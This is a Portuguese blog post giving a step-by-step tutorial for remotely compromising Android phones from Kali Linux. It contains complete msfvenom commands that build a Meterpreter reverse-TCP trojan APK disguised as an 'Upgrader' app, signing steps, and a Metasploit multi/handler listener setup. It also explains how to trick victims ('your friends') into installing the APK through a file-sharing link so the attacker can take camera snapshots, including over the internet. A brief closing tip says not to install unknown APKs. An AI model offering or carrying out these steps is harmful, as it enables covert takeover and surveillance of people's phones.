Kali Linux

Kali Linux é uma distribuição de testes de penetração, frequentemente usada por profissionais, para executar testes de segurança.

Sugiro que os leitores instalem uma cópia do Kali Linux no VirtualBox ou VMware para ataques, em nível de rede, em dispositivos Android. O Kali Linux pode ser baixado do seguinte link:

https://www.kali.org/downloads/

Disclaimer

 

Muito se pergunta, podemos realmente hackear usando Kali Linux? Não, realmente não. Os exploits incluídos no Kali/Backtrack são mais “amostras de código” do que exploits reais que se podem usar – eles são extremamente inadequados para trabalhar em um sistema corretamente atualizado e protegido, simplesmente porque são de conhecimento público, o que significa que quase tudo já está corrigido com patches contra eles. A maioria deles irá apenas disparar um alarme na rede, e é isso. Você pode ir para a prisão e ser julgado como um hacker, e além do sistema judicial ninguém mais vai pensar que você é um hacker.

Se você deseja exploits apropriados, tem que escrevê-los você mesmo ou pagar por eles. O preço é variável, eu já li que alguns podem custar milhões de dólares (digamos, uma cadeia de exploits, para vulnerabilidades desconhecidas (chamadas “0 days”, porque zero dias se passaram desde que a vulnerabilidade se tornou conhecida publicamente) que permitem que você saia do JavaScript de um site para o modo kernel em vários dispositivos e sistemas operacionais).

No entanto, para hackear, devemos entender completamente o sistema, como os dados são transmitidos, qual protocolo é usado, quais serviços estão sendo executados em diferentes portas.

O segredo é  ser um bom observador para considerar cada detalhe, porque os hacks são executados no elo mais fraco não o mais forte.

…e chega de tanto instalar ferramentas, ainda faltam algumas, mas já podemos produzir um pouco e mostrar que o Kali não é tão inocente assim.

 

Hackeando o Android, remotamente, usando Kali

 

1 – Inicie o Kali:

Abra um terminal e faça um .apk Cavalo de Tróia.

Você pode fazer isso digitando:

ifconfig (para verificar o seu ip)

msfvenom -p android/meterpreter/reverse_tcp LHOST = 192.168.25.34 R> /root/Upgrader.apk

Você também pode hackear android na WAN, ou seja, através da Internet, usando seu IP público/externo no LHOST e por encaminhamento de porta

k01.jpg

Depois o assine-o com d2j-apk-sign (nome do seu arquivo apk).

d2j-apk-sign /root/Upgrader.apk

Agora que você assinou seu apk, ele ganhou o nome Upgrader-signed.apk

 

2 – Carregue o console metasploit

Digite:

msfconsole

k02.jpg

3 – Configurar um ouvinte:

Depois que ele carrega (vai levar tempo), rode o exploit multi-handler digitando:

use exploit/multi/handler

k03

Configure um payload reverso digitando:

set payload android/meterpreter/reverse_tcp

Para definir o L host, digite:

set LHOST 192.168.25.34

(Mesmo se você estiver hackeando em WAN digite seu IP privado/interno aqui, não o público/externo)

4 – Exploit!

Finalmente digite:

exploit

para iniciar o ouvinte.

Faça upload do aplicativo (Upgrader-signed.apk) para Dropbox ou qualquer site de compartilhamento (como: http://www.speedyshare.com).

Em seguida, envie o link que o Website lhe deu para seus amigos e explorar seus telefones (Somente na LAN, mas se você usou o método WAN, então você pode usar o exploit em qualquer lugar na INTERNET)

Deixe a vítima instalar o aplicativo (ele pensa que se destina a atualizar alguns recursos em seu telefone).

Note que a opção de permissão para a instalação de aplicativos de fontes desconhecidas deve ser habilitado a partir das configurações de segurança do android para permitir a instalação do cavalo de Tróia.

E quando ele clica em Abrir …

k06

Você pode, agora, tirar tantos snapshots quanto queira

k08

k07.jpg

Hoje, na ansiedade de postar algo, usei um Smartphone Sansung, com apenas uma Câmera, a traseira; no entanto, já testei esta receita com android 6.0.

Dica: isto não se aplica apenas ao android, tente msfvenom -l payloads (lista payloads),

Conclusão:

  1. Com poucos comandos é possível invadir um smartphone android

msfvenom -p android/meterpreter/reverse_tcp LHOST= {SEU IP} LPORT=4444 R > /root/qualquer.apk

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost SEU IP

set lport 4444

exploit

  1. Não instale o APK de origem desconhecida.
  1. Se você realmente deseja instalar APK de fonte desconhecida, verifique se você pode ler e examinar o código-fonte.

Até o próximo post! Se achou útil compartilhe, de um Like e comente.

 

Anúncios

2 comentários

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s